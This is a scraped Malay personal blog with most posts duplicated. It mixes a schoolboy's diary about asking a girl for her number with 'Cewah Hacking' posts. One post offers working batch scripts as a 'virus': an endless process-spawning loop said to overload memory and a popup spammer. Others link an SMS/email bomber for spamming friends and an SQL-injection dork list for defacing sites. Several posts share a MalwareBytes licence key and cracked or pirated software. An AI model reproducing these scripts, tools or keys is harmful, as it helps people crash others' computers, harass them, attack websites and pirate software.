So hari ni aku nak minta number dia balik . Aku ceritakan pasal jadual kelas aku hari ni pulak . Aku tengok hari ni ada Kelas matematik . so adek dia akan hantar cokulater . kelas adek dia ni dekat bawah . perempuan yang aku maksutkan tu . Kelas aku dekat atas bukit .

Pada waktu tu aku duduk dekat tangga . lepak dengan kawan aku . macam biasa . sekarang ni waktu rehat . Dalam beberapa minit adek dia datang . ada kokulater dekat tangan dia . waktu dia naik tangga tu aku angkat kening . macam teguran . oit oit . hahaha

Dia pun bagi respon macam yang aku bagi jugak . Fuh .. aku masih ingat waktu tu . Rasa macam tak percaya pun ada . tapi apa boleh buat . dia sekarang ni dah tiada lagi bersama dengan aku .

So . aku pun kejar dia . lepas tu aku berhenti dekat depan dia . masih jugak aku guna ayat yang sama . minta number hanfon dia .

Waktu tu dia pegang kolkulater . jadi dia buka kolkulater . dia tekan something . lepas tu dia cakap . nah . kau berik dengan kakak aku lok .("kau bagi dengan kakak aku nanti") sambil senyum senyum .

Aku pun bagi . lepas tu dekat kolkulater tu ade number handfon dia . wow . hahaha . ni cara baru . aku rasa nak menjerit jerit pun ada waktu tu . sebab dapat number dia . sebenarnya , aku tak ade niat pun atau ade perasaan pun dekat perempuan tu . so . lepas balik je aku dari sekolah . aku pun masej dia .

Cakap macam biasa . hai hai . macam lucu pulak rasanya kalau kita kenangkan balik bende bende macam ni .

Lepas dalam masabeberapa minggu aku mesej dengan dia . pada satu malam tu . aku tanya dia satu soalan . awak . awak sudi tak jadi orang istimewa untuk saya ?

Lepas tu dia cakap . Erk . tak tahu la .

Hehe . jawapan tak tahu tu yang buat aku makin semangat . so aku masih paksa dia pada malam tu . nak dia cakap . dia sudi tak jadi teman istimewa aku . aku cuba ayat ayatkan dia .
aku tanya balik .

Awak . awak sudi tak jadi teman istimewa dalam Hidup saya ?

Yup Erry . saya Sudi .

Waktu tu malam . dalam pukul 10.30 . aku kena tidur awal . sebab eso kelas

pada malam tu aku nak rasa menjerit gembira pun ada. aku sangat happy waktu tu .


-Bersambung-
12.9.2011

Fuh
~ Hari ni aku dekat sekolah . boring pulak rasanya harini . so aku ada plan nak pergi kantin dengan kawan aku . Macam biasa , tengah berjalan bergurau senda dengan kawan kawan . kawan aku ni cukup spoting . dia juga orang yang serius . so memang biasa la orang lelaki .

so dalam perjalanan pergi ke kantin . aku terjumpa seorang budak perempuan ni . kakak dia sama kelas dengan aku .
s
Aku pura pura linpas depan dia . Dah sampai je depan dia aku mintak no handphone . kot kot dia nak kasi . rupanya tak . dia senyum senyum manis je dengan aku . budak tu budak bidayuh . dia tak nak kasi dengan aku dan jalan terus je

ok . so harini aku melepas lagi . harap besok aku dapat minta number dia balik . sebab aku lebih berani meluahkan perasaan mengunakan cara mesej daripada face to face .

Balik kelas je lepas minta number perempuan tu tadi . kan dia tak nak kasi dengan aku . so aku minta dengan kakak dia pulak . so ni secara ringas penjelasan tentang latar belakang perempuan tu . dia orang bidayuh .

So aku masih ingat apa yang dia ajar dengan aku . "do nuak piin ti ?" tak betul kot ejaan tu . tapi maksut dia "kau nak tak minum air ni?" hahaha .

Berbalik kepada cerita aku dengan kakak di pulak . so aku cuba minta dengan kakak dia .
lepas tu kakak dia cakap macam ni "mintak kau pun dengan nya . aku sik ingat number hanpon nya aih . hahah "
maksut nya "kau minta dengan dia sendiri . aku tak ingat number dia"

Dalam hati aku cakap aduhh ~~

hahah . memang biasa la kot . perempuan mana nak kasi number adek dia dengan orang lain . so aku nak try minta number dia balik .

13.9.2011

So hari ni aku nak minta number dia balik . Aku ceritakan pasal jadual kelas aku hari ni pulak . Aku tengok hari ni ada Kelas matematik . so adek dia akan hantar cokulater . kelas adek dia ni dekat bawah . perempuan yang aku maksutkan tu . Kelas aku dekat atas bukit .

Pada waktu tu aku duduk dekat tangga . lepak dengan kawan aku . macam biasa . sekarang ni waktu rehat . Dalam beberapa minit adek dia datang . ada kokulater dekat tangan dia . waktu dia naik tangga tu aku angkat kening . macam teguran . oit oit . hahaha

Dia pun bagi respon macam yang aku bagi jugak . Fuh .. aku masih ingat waktu tu . Rasa macam tak percaya pun ada . tapi apa boleh buat . dia sekarang ni dah tiada lagi bersama dengan aku .

So . aku pun kejar dia . lepas tu aku berhenti dekat depan dia . masih jugak aku guna ayat yang sama . minta number hanfon dia .

Waktu tu dia pegang kolkulater . jadi dia buka kolkulater . dia tekan something . lepas tu dia cakap . nah . kau berik dengan kakak aku lok .("kau bagi dengan kakak aku nanti") sambil senyum senyum .

Aku pun bagi . lepas tu dekat kolkulater tu ade number handfon dia . wow . hahaha . ni cara baru . aku rasa nak menjerit jerit pun ada waktu tu . sebab dapat number dia . sebenarnya , aku tak ade niat pun atau ade perasaan pun dekat perempuan tu . so . lepas balik je aku dari sekolah . aku pun masej dia .

Cakap macam biasa . hai hai . macam lucu pulak rasanya kalau kita kenangkan balik bende bende macam ni .

Lepas dalam masabeberapa minggu aku mesej dengan dia . pada satu malam tu . aku tanya dia satu soalan . awak . awak sudi tak jadi orang istimewa untuk saya ?

Lepas tu dia cakap . Erk . tak tahu la .

Hehe . jawapan tak tahu tu yang buat aku makin semangat . so aku masih paksa dia pada malam tu . nak dia cakap . dia sudi tak jadi teman istimewa aku . aku cuba ayat ayatkan dia .
aku tanya balik .

Awak . awak sudi tak jadi teman istimewa dalam Hidup saya ?

Yup Erry . saya Sudi .

Waktu tu malam . dalam pukul 10.30 . aku kena tidur awal . sebab eso kelas

pada malam tu aku nak rasa menjerit gembira pun ada. aku sangat happy waktu tu .


-Bersambung-

Cewah Hacking : Cara buat Pop Up Adly ads dekat blog

http://fastgush.com/wp-content/uploads/adly-logo.png

Salam Sejahtera semua

hari ni seth nak ajar korang cara buat Pop p script dekat blog ./ wordpress ./ website ./ forum dan lain lain .

Maukan Kode ni :

<script>
var adfly_id = Tukar ke Id korang;
var adfly_advert = 'int';
var frequency_cap = 5;
var frequency_delay = 5;
var init_delay = 3;
</script>
<script src="http://adf.ly/js/entry.js"></script>

Masukan dalam Pop Up box s ataupun dalam Html Korang .

Automatik akan masuk dalam adly ads korang . peace
http://fastgush.com/wp-content/uploads/adly-logo.png

Salam Sejahtera semua

hari ni seth nak ajar korang cara buat Pop p script dekat blog ./ wordpress ./ website ./ forum dan lain lain .

Maukan Kode ni :

<script>
var adfly_id = Tukar ke Id korang;
var adfly_advert = 'int';
var frequency_cap = 5;
var frequency_delay = 5;
var init_delay = 3;
</script>
<script src="http://adf.ly/js/entry.js"></script>

Masukan dalam Pop Up box s ataupun dalam Html Korang .

Automatik akan masuk dalam adly ads korang . peace

Cewah Hacking : Cara Remove Malware Dari Komputer



Ok . Sekarang Seth Akan ajar korang cara remove Malware Dari Komputer Korang .

Untuk Penjelasan Apa Itu malware ? Klik Link Dibawah

Apa Itu Malware ?

Ok . Cara Remove adalah ?

Pertama korang download ni . Benda Ini dipanggil RatKill

Download Sini


Selepas itu Korang Download MalwareBytes

Download Sini


License Key adalahh :

ID:1BW57U0P2R

Serial: J42M-XX9K-X84Y-7BDU


Kalau Korang dah lakukan Perkara dekat atas . Maksutnya Komputer anda akan di remove malware di dalamnya . InsyaAllah


Peace





Ok . Sekarang Seth Akan ajar korang cara remove Malware Dari Komputer Korang .

Untuk Penjelasan Apa Itu malware ? Klik Link Dibawah

Apa Itu Malware ?

Ok . Cara Remove adalah ?

Pertama korang download ni . Benda Ini dipanggil RatKill

Download Sini


Selepas itu Korang Download MalwareBytes

Download Sini


License Key adalahh :

ID:1BW57U0P2R

Serial: J42M-XX9K-X84Y-7BDU


Kalau Korang dah lakukan Perkara dekat atas . Maksutnya Komputer anda akan di remove malware di dalamnya . InsyaAllah


Peace



Cewah Best : Counter Strike Point Blank

[Image: bgpbhessho2hi.jpg]



Code:
System Requirements
- Operating System: Windows ME/2000/XP
- Processor: 500 MHz @ Intel Pentium 3 or Higher
- Memory: 128 MB @ Minimum or Higher
- Video Graphic: 32 MB @ Minimum or Higher
- Sound: Windows Compatible Sound Card

Code:
Install Notes
- Open folder D2X-GAMES and unzip to decompress files
- Install game with CSPB Setup.exe
- Insert password to install game
- Play the game
- Enjoy it!

[Image: tarantulaak471.jpg]
[Image: viperredingamehi.jpg]




Mediafire Part 1 | 180.00 MB
Mediafire Part 2 | 162.18 MB

PASSWORD: d2xgames.blogspot.com
[Image: bgpbhessho2hi.jpg]



Code:
System Requirements
- Operating System: Windows ME/2000/XP
- Processor: 500 MHz @ Intel Pentium 3 or Higher
- Memory: 128 MB @ Minimum or Higher
- Video Graphic: 32 MB @ Minimum or Higher
- Sound: Windows Compatible Sound Card

Code:
Install Notes
- Open folder D2X-GAMES and unzip to decompress files
- Install game with CSPB Setup.exe
- Insert password to install game
- Play the game
- Enjoy it!

[Image: tarantulaak471.jpg]
[Image: viperredingamehi.jpg]




Mediafire Part 1 | 180.00 MB
Mediafire Part 2 | 162.18 MB

PASSWORD: d2xgames.blogspot.com

Cewah Hacking : Ebomb Virus ( Batch)

Salam Sejahtera Semua

Hari Ni Seth Nak ajar korang cara Buat virus yang simple . Mengunakan Notepad .

Ok .

1. Ebomb



Kode :

@echo off
:A
Start
goto:A

(akan menyebabkan CMD keluar secara banyak dan Overload Memory komputer)

2.Manual Makin Spammer .

Kode :

@echo off
:A
msg * <mesej korang>
goto:A

(untuk mengeluarkan pop up windoes yang banyak dengan pesanan korang)

3.Jam dan Tarikh

Kode :


@echo off
:A
echo Here is the current time %date% %time%
goto:A


Itu sahaja . Guna baik baik . peace

Salam Sejahtera Semua

Hari Ni Seth Nak ajar korang cara Buat virus yang simple . Mengunakan Notepad .

Ok .

1. Ebomb



Kode :

@echo off
:A
Start
goto:A

(akan menyebabkan CMD keluar secara banyak dan Overload Memory komputer)

2.Manual Makin Spammer .

Kode :

@echo off
:A
msg * <mesej korang>
goto:A

(untuk mengeluarkan pop up windoes yang banyak dengan pesanan korang)

3.Jam dan Tarikh

Kode :


@echo off
:A
echo Here is the current time %date% %time%
goto:A


Itu sahaja . Guna baik baik . peace

Cewah Best : Upacara kahwin dengan mayat

◙ Upacara Kahwin Dengan Mayat ◙
Seorang lelaki di Thailand sanggup mengahwini mayat kekasihnya yang tidak sempat dia kahwini kerana kesibukan kerja. Satu peringatan kepada kita semua.

Upacara Kahwin Dengan Mayat Cantik | Satu majlis pahit manis yang diadakan baru-baru ini menandakan permulaan dan perpisahan sepasang kekasih yang sudah sekian lama bercinta. Dalam kisah cinta yang memilukan dan juga aneh, seorang lelaki Thai menganjurkan upacara pengebumian dan juga perkahwinan serentak untuk teman wanitanya yang mati mengejut sebelum mereka dapat berkahwin secara rasmi.

Lelaki berkenaan ialah Chadil Deffy yang juga dikenali sebagai Deff Yingyuen, pengarah sebuah stesen televisyen di timur laut Thailand. Sepanjang 10 tahun lalu, dia hanya memberi tumpuan terhadap hasrat untuk menyambung pelajaran dan kariernya selepas menamatkan pelajaran di Universiti Timur Asia, tempat dia berkenalan dengan Sarinya ‘Anne’ Kamsook.

Selepas jatuh cinta di universiti itu dan tinggal bersama selama 10 tahun, Anne memutuskan untuk berkahwin. Namun, hasratnya tertunda kerana Deff mahu memastikan kariernya kukuh dulu tetapi berjanji untuk mengahwini kekasihnya itu. Tetapi Anne mati pada 3 Januari selepas terbabit dalam kemalangan. Deff yang kesal kerana tidak sempat untuk menunaikan janji, akhirnya mengambil keputusan berkahwin pada hari pengebumian Anne, kelmarin.

Anggota keluarga dan rakan dijemput menerusi Facebook untuk menghadiri majlis perkahwinan dan sekali gus upacara pengebumian di sebuah kuil di Surin. Dengan berpakaian tuxedo pada majlis itu, Deff yang kelihatan sedih, menyarungkan cincin pada jari mayat Anne selepas dikahwinkan oleh seorang sami baru, yang mengikut tradisi penganut Buddha Thai, boleh menjamin perkahwinan yang berkekalan.
Pada majlis itu, mayat Anne dipakaikan dengan pakaian serba putih dan diletakkan diatas papan. Selepas menyarungkan cincin, Deff mencium tangan dan dahi pengantin perempuan, disaksikan oleh anggota keluarga. – Agensi

– Kerana kesibukan kerja, lelaki ini terlupa yang mati tidak akan menunggu sesiapa dan inilah yang terjadi. Dia sanggup mengahwini mayat kekasihnya yang mati dalam satu kemalangan sebagai hukuman kepada dirinya yang selalu mengabaikan kekasihnya itu. Peringatan kepada kita semua, jika dah ada yang berkenan, tak payah la tunggu lama-lama, pergi masuk meminang dah kahwin. Dosa terhindar, nikmat pun dapat hehe












◙ Upacara Kahwin Dengan Mayat ◙
Seorang lelaki di Thailand sanggup mengahwini mayat kekasihnya yang tidak sempat dia kahwini kerana kesibukan kerja. Satu peringatan kepada kita semua.

Upacara Kahwin Dengan Mayat Cantik | Satu majlis pahit manis yang diadakan baru-baru ini menandakan permulaan dan perpisahan sepasang kekasih yang sudah sekian lama bercinta. Dalam kisah cinta yang memilukan dan juga aneh, seorang lelaki Thai menganjurkan upacara pengebumian dan juga perkahwinan serentak untuk teman wanitanya yang mati mengejut sebelum mereka dapat berkahwin secara rasmi.

Lelaki berkenaan ialah Chadil Deffy yang juga dikenali sebagai Deff Yingyuen, pengarah sebuah stesen televisyen di timur laut Thailand. Sepanjang 10 tahun lalu, dia hanya memberi tumpuan terhadap hasrat untuk menyambung pelajaran dan kariernya selepas menamatkan pelajaran di Universiti Timur Asia, tempat dia berkenalan dengan Sarinya ‘Anne’ Kamsook.

Selepas jatuh cinta di universiti itu dan tinggal bersama selama 10 tahun, Anne memutuskan untuk berkahwin. Namun, hasratnya tertunda kerana Deff mahu memastikan kariernya kukuh dulu tetapi berjanji untuk mengahwini kekasihnya itu. Tetapi Anne mati pada 3 Januari selepas terbabit dalam kemalangan. Deff yang kesal kerana tidak sempat untuk menunaikan janji, akhirnya mengambil keputusan berkahwin pada hari pengebumian Anne, kelmarin.

Anggota keluarga dan rakan dijemput menerusi Facebook untuk menghadiri majlis perkahwinan dan sekali gus upacara pengebumian di sebuah kuil di Surin. Dengan berpakaian tuxedo pada majlis itu, Deff yang kelihatan sedih, menyarungkan cincin pada jari mayat Anne selepas dikahwinkan oleh seorang sami baru, yang mengikut tradisi penganut Buddha Thai, boleh menjamin perkahwinan yang berkekalan.
Pada majlis itu, mayat Anne dipakaikan dengan pakaian serba putih dan diletakkan diatas papan. Selepas menyarungkan cincin, Deff mencium tangan dan dahi pengantin perempuan, disaksikan oleh anggota keluarga. – Agensi

– Kerana kesibukan kerja, lelaki ini terlupa yang mati tidak akan menunggu sesiapa dan inilah yang terjadi. Dia sanggup mengahwini mayat kekasihnya yang mati dalam satu kemalangan sebagai hukuman kepada dirinya yang selalu mengabaikan kekasihnya itu. Peringatan kepada kita semua, jika dah ada yang berkenan, tak payah la tunggu lama-lama, pergi masuk meminang dah kahwin. Dosa terhindar, nikmat pun dapat hehe












Saturday, April 21, 2012

Cewah Hacking : Email Boomber

Salam Sejahtera Semua


Harini Seth nak kongsi satu software . Sms Bomber . Boleh untuk menghantar mesej dekat hanphone kawan korang dan spam dekat email diorang .

http://desmond.imageshack.us/Himg136/scaled.php?server=136&filename=bomber2do8.png&res=landing

(Gambar sekadar Hiasan)

Korang Boleh Download sini

Download
Salam Sejahtera Semua


Harini Seth nak kongsi satu software . Sms Bomber . Boleh untuk menghantar mesej dekat hanphone kawan korang dan spam dekat email diorang .

http://desmond.imageshack.us/Himg136/scaled.php?server=136&filename=bomber2do8.png&res=landing

(Gambar sekadar Hiasan)

Korang Boleh Download sini

Download

Cewah Hacking : Dengar Radio Dragon Force Mengunakan Vlc ./ etc


Salam Sejahtera semua ,


Hari ni saya nak ajar korang cara dengar radio Dragon Force mengunakan Vlc palayer dan lain lain player .

Ok . korang juga boleh dengar terus dari sini

Radio Dragon force

Ok . kalau korang nak dengar radio Dragon Force dengan Music Player . Korang boleh download Files Ni .

Listen.pl

Working dalam Vlc player ./ winnamp ./ Music Player ./ Classic Music Players

Download sini

p/s: Untuk yang nak dengar mengunakan media player sahaja . peace

Salam Sejahtera semua ,


Hari ni saya nak ajar korang cara dengar radio Dragon Force mengunakan Vlc palayer dan lain lain player .

Ok . korang juga boleh dengar terus dari sini

Radio Dragon force

Ok . kalau korang nak dengar radio Dragon Force dengan Music Player . Korang boleh download Files Ni .

Listen.pl

Working dalam Vlc player ./ winnamp ./ Music Player ./ Classic Music Players

Download sini

p/s: Untuk yang nak dengar mengunakan media player sahaja . peace

Cewah Hacking : Koleksi SQLi google Dork Download

salam sejahtera

hari ni saya nak share big list untuk sqli dork untuk deface ./ etc . terpulang kepada korang .

http://3.bp.blogspot.com/-YCf7iUAp2g8/TcZSR1MY6OI/AAAAAAAAAX4/cljcA90V50o/s1600/google+dork.png

Lebih daripad 5000 dork .

Korang Boleh download disini

Download sini
salam sejahtera

hari ni saya nak share big list untuk sqli dork untuk deface ./ etc . terpulang kepada korang .

http://3.bp.blogspot.com/-YCf7iUAp2g8/TcZSR1MY6OI/AAAAAAAAAX4/cljcA90V50o/s1600/google+dork.png

Lebih daripad 5000 dork .

Korang Boleh download disini

Download sini

Cewah Tutorial : Cara Membuat Autolike Dekat Facebook

http://blog.commarts.wisc.edu/wp-content/uploads/2011/04/costume-facebook-like.jpg






Salam Sejahtera semua

Hari ni seth nak buat tutorial cara auto like dekat facebook mengunakan firefox addons.

Bagaimana autolike ni berfungsi ?

Ok . autolike ni berfungsi secara automatik . Korang akan automatik like post kawan korang bila korang scroll sahaja facebook .

Peringatan :

1.Jangan selalu mengunakanya kerana takut kena block oleh facebook

2.Hanya working di dalam Browers Mazilla firefox ./ waterfox ./ palemoon sahaja . bukan chrome ./ opera dan etc

Ok . Jom ke tutorialnya . ( Tak ada Screen shot )

1.) Install add-ons Greasemonkey >>> Install
Greasemonkey

https://addons.mozilla.org/en-US/firefox/addon/748/

2.) Install facebook auto like >>> install auto
like

http://userscripts.org/scripts/show/82031

Ok , kalau korang ikut tutorial dekat atas tu 100% . pasti berjaya . good luck .

p/s : Semakin bawah korang scroll . makin banyak autolike nya .. peace
http://blog.commarts.wisc.edu/wp-content/uploads/2011/04/costume-facebook-like.jpg






Salam Sejahtera semua

Hari ni seth nak buat tutorial cara auto like dekat facebook mengunakan firefox addons.

Bagaimana autolike ni berfungsi ?

Ok . autolike ni berfungsi secara automatik . Korang akan automatik like post kawan korang bila korang scroll sahaja facebook .

Peringatan :

1.Jangan selalu mengunakanya kerana takut kena block oleh facebook

2.Hanya working di dalam Browers Mazilla firefox ./ waterfox ./ palemoon sahaja . bukan chrome ./ opera dan etc

Ok . Jom ke tutorialnya . ( Tak ada Screen shot )

1.) Install add-ons Greasemonkey >>> Install
Greasemonkey

https://addons.mozilla.org/en-US/firefox/addon/748/

2.) Install facebook auto like >>> install auto
like

http://userscripts.org/scripts/show/82031

Ok , kalau korang ikut tutorial dekat atas tu 100% . pasti berjaya . good luck .

p/s : Semakin bawah korang scroll . makin banyak autolike nya .. peace

Cewah Best : Seni Gubahan Buku





















Cewah Best : Restoran Air Terjun

Nak tengok yang gempak ? jom korang tengok restoran air terjun










Nak tengok yang gempak ? jom korang tengok restoran air terjun










Cewah Best : Wondershare Video Editor 3.00 Full Patch


Download Sini


- Support all SD and HD videos, including WMV, AVI, MP4, FLV, MOV, MKV, MTS, etc. You can also capture videos directly with a video capture device or add videos from camcorders and other external hard drives directly. New
- Add background music to your videos to add more flavor. All regular audio formats like MP3, WMA, WAV, M4A, AAC, AC3, OGG, etc. are supported.
- Import photos like BMP, JPG, PNG, GIF, etc. and create home movies with photos and videos combined.
- Edit and personalize videos/photos/audios with video editing features like trim, crop, rotate, set fade in & fade out, adjust duration, etc.
- Add stylish captions on your videos and photos with customizable font, color, etc. to for better video meaning conveying.
- Bring your movie to the next level instantly with professional and creative filter effects. 30+ filters are ready for your videos and photos. New
- Add transition effects between two clips and apply motion effects to photos so as to achieve a natural and smooth transition.
- Get optimized videos for playback on your portable devices like iPhone, iPad, PSP, iPod, Wii, Zune, etc.
- Save edited videos to local hard drive for further use in a variety of video formats.
- Directly upload your video creation to YouTube for sharing with more people by filling in necessary information.
- Burn videos to DVD discs or save as DVD folder or ISO image files to preserve videos in a better way.

Download Sini


- Support all SD and HD videos, including WMV, AVI, MP4, FLV, MOV, MKV, MTS, etc. You can also capture videos directly with a video capture device or add videos from camcorders and other external hard drives directly. New
- Add background music to your videos to add more flavor. All regular audio formats like MP3, WMA, WAV, M4A, AAC, AC3, OGG, etc. are supported.
- Import photos like BMP, JPG, PNG, GIF, etc. and create home movies with photos and videos combined.
- Edit and personalize videos/photos/audios with video editing features like trim, crop, rotate, set fade in & fade out, adjust duration, etc.
- Add stylish captions on your videos and photos with customizable font, color, etc. to for better video meaning conveying.
- Bring your movie to the next level instantly with professional and creative filter effects. 30+ filters are ready for your videos and photos. New
- Add transition effects between two clips and apply motion effects to photos so as to achieve a natural and smooth transition.
- Get optimized videos for playback on your portable devices like iPhone, iPad, PSP, iPod, Wii, Zune, etc.
- Save edited videos to local hard drive for further use in a variety of video formats.
- Directly upload your video creation to YouTube for sharing with more people by filling in necessary information.
- Burn videos to DVD discs or save as DVD folder or ISO image files to preserve videos in a better way.

Cewah Best : Ini Barulah Kucing yang Gemuk

kucing ini tidak boleh berjalan dengan baik . kucing ini hanya boleh berjalan terkedek kedek .
badan kucing ini berjalur dua kuning dan berat kucing ini melebihi 2o paun

Penjaga kucing ini tidak boleh lagi menjaga kucing ini , jadi pemilik kucing ini berusia 82 tahun telahpun menhantar kucing tersebut ke tempat perlindungan di tenggara New Mexico yang dikenali sebagai tempat tinggal Santa Fe bantuan.





Klik Untuk mainkan Video

Cat weighs in at 39 pounds; needs home: kasa.com


Sumber-dailymail

kucing ini tidak boleh berjalan dengan baik . kucing ini hanya boleh berjalan terkedek kedek .
badan kucing ini berjalur dua kuning dan berat kucing ini melebihi 2o paun

Penjaga kucing ini tidak boleh lagi menjaga kucing ini , jadi pemilik kucing ini berusia 82 tahun telahpun menhantar kucing tersebut ke tempat perlindungan di tenggara New Mexico yang dikenali sebagai tempat tinggal Santa Fe bantuan.





Klik Untuk mainkan Video

Cat weighs in at 39 pounds; needs home: kasa.com


Sumber-dailymail

Cewah Info : Botol Arak Tertulis Kalimah ‘Allah’ Cetus Kemarahan

[Image: kazakh-vodka-565x354.jpg][Image: kazakh-vodka-1-227x300.jpg]



Salah sebuah pengeluar vodka terbesar di Kazakhstan,Goem, baru-baru ini mencetus kemarahan umat Islam di negara itu apabila meletakkan label tertulis kalimah ‘Allah’ pada salah satu produk minuman kerasnya.

Pembalut plastik pada penutup botol vodka Baiterek itu tertera kalimah ‘Allah’ dengan menggunakan slogan ‘Kekuatan Allah Cukup Untuk Semua Orang’.

Beberapa pemimpin Islam, ulama dan masyarakat muslim di negara itu telah mengadakan demontrasi selama lebih seminggu sambil mengutuk tindakan syarikat yang tidak bertanggungjawab mencemar nama ‘Allah’ itu.

“Sekiranya mereka yang melakukan perkara ini mahu selamat, mereka perlu meminta maaf dan bertaubat segera.

“Allah melarang minuman beralkohol dan perbuatan ini adalah satu penghinaan kepadaNya,” kata salah seorang ulama, Bekzat Boranbai, yang dipetik dari stesen penyiaran negara itu, KTK Televisyen.

Menurut fahaman penganut Kristian yang menggemari minuman keras di negara itu, kalimah ‘Tuhan’ merujuk kepada ‘Allah’ dan ia menjustifikasikan penggunaan kalimah itu pada pembalut botol vodka tersebut.

Bagaimanapun, pihak berkuasa negara serpihan Soviet Union itu dengan segera bertindak mengarahkan syarikat pengeluar vodka jenama Baiterek tersebut untuk menarik balik semua produk mereka serta merta.

Seorang jurucakap yang mewakili syarikat Goem menjelaskan bahawa insiden meletakkan label yang mencetus kemarahan umat Islam itu adalah berpunca dari salah faham yang berlaku dari peringkat keluaran pertama produk itu di negara jiran, Rusia.

Di Rusia, labelnya tertulis perkataan ‘God’ yang membawa makna ‘Tuhan’ dan pihak pemasaran di Kazakhstan pula menggunakan label berbahasa arab menterjemahkan perkataan itu sebagai ‘Allah’. – Mynewshub.my
[Image: kazakh-vodka-565x354.jpg][Image: kazakh-vodka-1-227x300.jpg]



Salah sebuah pengeluar vodka terbesar di Kazakhstan,Goem, baru-baru ini mencetus kemarahan umat Islam di negara itu apabila meletakkan label tertulis kalimah ‘Allah’ pada salah satu produk minuman kerasnya.

Pembalut plastik pada penutup botol vodka Baiterek itu tertera kalimah ‘Allah’ dengan menggunakan slogan ‘Kekuatan Allah Cukup Untuk Semua Orang’.

Beberapa pemimpin Islam, ulama dan masyarakat muslim di negara itu telah mengadakan demontrasi selama lebih seminggu sambil mengutuk tindakan syarikat yang tidak bertanggungjawab mencemar nama ‘Allah’ itu.

“Sekiranya mereka yang melakukan perkara ini mahu selamat, mereka perlu meminta maaf dan bertaubat segera.

“Allah melarang minuman beralkohol dan perbuatan ini adalah satu penghinaan kepadaNya,” kata salah seorang ulama, Bekzat Boranbai, yang dipetik dari stesen penyiaran negara itu, KTK Televisyen.

Menurut fahaman penganut Kristian yang menggemari minuman keras di negara itu, kalimah ‘Tuhan’ merujuk kepada ‘Allah’ dan ia menjustifikasikan penggunaan kalimah itu pada pembalut botol vodka tersebut.

Bagaimanapun, pihak berkuasa negara serpihan Soviet Union itu dengan segera bertindak mengarahkan syarikat pengeluar vodka jenama Baiterek tersebut untuk menarik balik semua produk mereka serta merta.

Seorang jurucakap yang mewakili syarikat Goem menjelaskan bahawa insiden meletakkan label yang mencetus kemarahan umat Islam itu adalah berpunca dari salah faham yang berlaku dari peringkat keluaran pertama produk itu di negara jiran, Rusia.

Di Rusia, labelnya tertulis perkataan ‘God’ yang membawa makna ‘Tuhan’ dan pihak pemasaran di Kazakhstan pula menggunakan label berbahasa arab menterjemahkan perkataan itu sebagai ‘Allah’. – Mynewshub.my
 

About

Site Info

Related Posts Plugin for WordPress, Blogger...

tutors Copyright © 2009 Community is Designed by Bie Converted To Community Galleria by Cool Tricks N Tips